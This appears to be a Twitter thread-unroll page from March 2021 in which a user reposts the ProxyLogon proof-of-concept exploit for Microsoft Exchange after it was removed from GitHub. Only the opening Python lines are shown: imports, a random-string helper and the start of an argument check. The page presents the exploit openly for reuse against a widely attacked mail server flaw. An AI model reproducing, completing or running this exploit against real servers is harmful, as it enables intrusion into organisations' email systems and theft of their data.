dragosr Profile picture
Stop, Think, Pwn!
Mar 11, 2021 32 tweets 6 min read
Here is that proxylogon PoC that was removed from GitHub bugs and all. import requests

from urllib3.exceptions import InsecureRequestWarning

import random

import string

import sys

def id_generator(size=6, chars=string.ascii_lowercase + string.digits):

return ''.join(random.choice(chars) for _ in range(size))

if len(sys.argv) < 2: